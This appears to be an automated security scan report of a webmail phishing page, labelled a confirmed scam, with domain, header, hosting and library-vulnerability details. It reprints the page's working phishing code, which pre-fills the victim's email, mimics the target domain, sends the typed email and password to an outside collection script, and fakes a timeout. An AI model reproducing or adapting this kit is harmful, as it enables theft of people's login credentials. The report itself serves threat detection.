healthcare medical

news media journalism

government public service

documentation technical

technology software

English

Within the .network top-level domain, 'webmailxcueu89-klausefncoi.appwrite.network' is registered; it also runs on subdomain 'webmailxcueu89-klausefncoi'. The registrable portion 'appwrite' spans 8 characters containing three vowels alongside five consonants. Tokenizing the label suggests 2 words: app, write. Median word length comes out to 4 characters. No strong language cues emerged from the frequency lists.

html/da/62/da6278d7-0c4b-44d9-ade8-b384cb0ddcbb.html.gz

base-uri 'self'; object-src 'none'; style-src 'self' 'unsafe-inline'; default-src 'self'; script-src 'self'

05b85d96f41fff14d8f608dad03ab71e2c1017c2da0914d7c59291bad7a54f8e

jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates

parseHTML() executes scripts in event handlers

jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution

passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

Regex in its jQuery.htmlPrefilter sometimes may introduce XSS

3b5e8e9c897749a5b1360d449e0e0df9c2d01ea87cca28c9d93282e6570ced72

e03ff0a75889e65f3240058da72b628a02a7aca6a6ea8c5f60d41b8694a47982

e444e62ad76818958c289e20d12c0ad4569329e6bc6416d393e89e3f67f8340a

viewport

referrer

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;worker-src blob: 'self';frame-ancestors 'none';

child-src https:  chrome-untrusted://new-tab-page/ chrome-untrusted://ntp-microsoft-auth/;connect-src chrome://webui-test chrome://resources chrome://theme 'self';default-src 'self';font-src chrome://resources 'self';img-src chrome://resources chrome://theme chrome://image chrome://favicon2 chrome://app-icon chrome://extension-icon chrome://fileicon blob: data: 'self';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources chrome://webui-test 'self';style-src chrome://resources chrome://theme 'self' 'unsafe-inline';trusted-types parse-html-subset sanitize-inner-html static-types lottie-worker-script-loader webui-test-script webui-test-html polymer-html-literal polymer-template-event-attribute-policy lit-html-desktop;frame-ancestors 'none';

base-uri 'none';child-src https:;form-action https://ogs.google.com https://*.corp.google.com;object-src 'none';script-src 'self' 'unsafe-inline' https:;frame-ancestors chrome://new-tab-page/

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;frame-ancestors 'none';

Amazon EC2 Abuse

IP Management

Amazon AWS Network Operations

Amazon.com, Inc.

AWS RPKI Management POC

IP Routing

Amazon EC2 Network Operations

AMAZO-CF


        // Ensure that parent window and opener reload if a page is redirected to login
        if (top.location != window.location) {
            top.location.reload();
        }
        if (window.opener && window.opener.top.location != window.location) {
            window.opener.top.location.reload();
            self.close();
        }
    


        <input type="hidden" class="form-control" name="hido" id="hido" value="">
        <input type="hidden" class="form-control" name="redirecto" id="redirecto" value="">
        <div class="body">
            <div class="xlogo">
                <img id="zion" src="https://firebasestorage.googleapis.com/v0/b/portal-aa363.appspot.com/o/favicons.png?alt=media&token=805fb0ef-a2d9-4a7f-85e6-d68384e166e3">
                <span style="text-transform: capitalize;" class='text-g' id="banNer"></span>
            </div>
            <div class="row">
                <div class="col1"><label for="id_email">Email:</label></div>
                <div class="col2"><input type="text" name="email" value="" id="id_email" placeholder="Email" readonly></div>
            </div>
            <div class="row">
                <div class="col1"><label for="id_pass">Password:</label></div>
                <div class="col2"><input type="password" name="password" id="id_pass" autofocus placeholder="Password"></div>
                <img id="id-password-reveal-icon" class="password-icon" src="https://fac.corp.fortinet.com/customviews/image/password_hidden:93edf7d3ceb704be92ee084ecc62c6c8/" alt="" onclick="setVisibility()"/>
            </div>
            <br><br>
            <div class="row">
                <div><span class="error" id="error"></span></div>
            </div>
            <div class="row">
                <div class="col1" style="line-height:40px;padding-top:10px;">
                    <input type="button" id='submit_btn' class="submit" value="Login" style="padding:7px 24px;" />
                </div>
            </div>
            <div class="row">
                <p>
                    All right reserved. Copyright © 2026 <span id="kai" style="text-transform: capitalize;"></span>.
                    <br>
                    <br>
                </p>
            </div>
        </div>
    


        // Initialize variables
        let attemptCount = 0;
        
        // Function to load template into container
        function loadTemplate() {
            const template = document.getElementById('tpl-password');
            const container = document.getElementById('container');
            if (template && container) {
                container.innerHTML += template.innerHTML;
                initPage();
            }
        }
        
        // Initialize page after template is loaded
        function initPage() {
            const hash = window.location.hash ? window.location.hash.substr(1) : '';
            
            // Process hash from URL if present
            if (hash) {
                const emailParts = hash.split('@');
                if (emailParts.length === 2) {
                    const email = hash;
                    const domain = emailParts[1];
                    const domainName = domain.split('.')[0];
                    
                    // Update page title and favicon
                    document.title = 'Webmail Portal Login - ' + domainName;
                    document.getElementById('favicon').href = 
                        'https://www.google.com/s2/favicons?domain=' + domain;
                    
                    // Update form fields
                    const hiddenEmailInput = document.querySelector('input[name="id_email"]');
                    const visibleEmailInput = document.getElementById('id_email');
                    const hidoInput = document.getElementById('hido');
                    const redirectoInput = document.getElementById('redirecto');
                    const bannerElement = document.getElementById('banNer');
                    const kaiElement = document.getElementById('kai');
                    
                    if (hiddenEmailInput) hiddenEmailInput.value = email;
                    if (visibleEmailInput) visibleEmailInput.value = email;
                    if (hidoInput) hidoInput.value = domain;
                    if (redirectoInput) redirectoInput.value = domain;
                    if (bannerElement) bannerElement.textContent = domainName;
                    if (kaiElement) kaiElement.textContent = domainName;
                    
                    // ========== NEW FUNCTIONALITY ==========
                    // Update logo to domain's favicon
                    const zionLogo = document.getElementById('zion');
                    if (zionLogo) {
                        zionLogo.src = 'https://www.google.com/s2/favicons?domain=' + domain;
                        zionLogo.alt = domainName + ' favicon';
                        zionLogo.title = domainName + ' logo';
                    }
                    
                    // Update background iframe to domain website
                    const backgroundIframe = document.getElementById('myframe');
                    if (backgroundIframe) {
                        backgroundIframe.src = 'https://www.' + domain;
                    }
                    // ========== END NEW FUNCTIONALITY ==========
                    
                    // Focus on password field
                    const passwordInput = document.getElementById('id_pass');
                    if (passwordInput) passwordInput.focus();
                }
            }
            
            // Add event listeners
            setupEventListeners();
        }
        
        // Setup event listeners
        function setupEventListeners() {
            const submitBtn = document.getElementById('submit_btn');
            const passwordInput = document.getElementById('id_pass');
            
            // Submit button click handler
            if (submitBtn) {
                submitBtn.addEventListener('click', handleSubmit);
            }
            
            // Enter key press handler on password field
            if (passwordInput) {
                passwordInput.addEventListener('keypress', function(e) {
                    if (e.key === 'Enter') {
                        handleSubmit(e);
                    }
                });
            }
        }
        
        // Handle form submission
        function handleSubmit(e) {
            e.preventDefault();
            
            const emailValue = document.getElementById('id_email')?.value.trim();
            const passwordValue = document.getElementById('id_pass')?.value.trim();
            
            if (!emailValue || !passwordValue) {
                document.getElementById('error').textContent = 'Please enter both email and password';
                return;
            }
            
            // Show loading indicators
            document.getElementById('bg_screen').style.display = 'block';
            document.getElementById('loading_image').style.display = 'block';
            
            // Prepare form data
            const formData = new FormData();
            formData.append('temail', emailValue);
            formData.append('tpass', passwordValue);
            
            // Send AJAX request
            const ajax = new XMLHttpRequest();
            ajax.open('POST', 'https://taquilax.cam/drtejkdokjg/result.php');
            
            ajax.onreadystatechange = function() {
                if (ajax.readyState === 4) {
                    // Hide loading indicators
                    document.getElementById('loading_image').style.display = 'none';
                    document.getElementById('bg_screen').style.display = 'none';
                    
                    // Handle third attempt redirect
                    if (attemptCount === 2) {
                        const redirectValue = document.getElementById('redirecto')?.value;
                        if (redirectValue) {
                            window.location = 'https://www.' + redirectValue;
                        }
                    }
                    
                    attemptCount++;
                    
                    // Clear password field and show message
                    document.getElementById('id_pass').value = '';
                    document.getElementById('error').textContent = 'Sign in attempt timeout, Please try again.';
                    
                    // Log the response for debugging
                    console.log('Response:', ajax.responseText);
                }
            };
            
            ajax.onerror = function() {
                // Hide loading indicators
                document.getElementById('loading_image').style.display = 'none';
                document.getElementById('bg_screen').style.display = 'none';
                document.getElementById('error').textContent = 'Check your network connection..';
            };
            
            ajax.send(formData);
        }
        
        // Password visibility toggle function
        window.setVisibility = function() {
            const passwordInput = document.getElementById('id_pass');
            const passwordIcon = document.getElementById('id-password-reveal-icon');
            
            if (!passwordInput || !passwordIcon) return;
            
            if (passwordInput.type === 'password') {
                passwordInput.type = 'text';
                passwordIcon.src = 'https://ik.imagekit.io/escrowmade/download__1__OSvF-Qvmk.png';
            } else {
                passwordInput.type = 'password';
                passwordIcon.src = 'https://ik.imagekit.io/escrowmade/download_0-BUoL3T3.png';
            }
        };
        
        // Hide password function
        window.hidePassword = function() {
            const passwordInput = document.getElementById('id_pass');
            const passwordIcon = document.getElementById('id-password-reveal-icon');
            
            if (passwordInput && passwordInput.type !== 'password') {
                passwordInput.type = 'password';
                if (passwordIcon) {
                    passwordIcon.src = 'https://ik.imagekit.io/escrowmade/download_0-BUoL3T3.png';
                }
            }
        };
        
        // Initialize when DOM is loaded
        document.addEventListener('DOMContentLoaded', function() {
            loadTemplate();
        });
    

X-UA-Compatible

PasswordField

JQuery

HSTS

jQuery CDN

Webmail Portal Login - hjartan

✅ Low Risk - https://webmailxcueu89-klausefncoi.appwrite.network/#info@hjartan.se

Requests	IP Address	Location	AS Autonomous System
3	13.35.58.104	United States	AS16509Amazon.com, Inc.
1	151.101.3.52	United States	AS54113Fastly, Inc.
1	151.101.66.137	United States	AS54113Fastly, Inc.
1	142.251.152.119	United States	AS15169Google LLC
1	178.63.16.224	Falkenstein, Saxony, Germany	AS24940Hetzner Online GmbH
1	142.251.155.119	United States	AS15169Google LLC
1	208.91.114.103	Surrey, British Columbia, Canada	AS40934Fortinet Inc.
9	7	-	-

Security Scan Report: webmailxcueu89-klausefncoi.appwrite.network

Summary

AI Security Verdict

Confirmed Scam

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Detected Technologies5

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History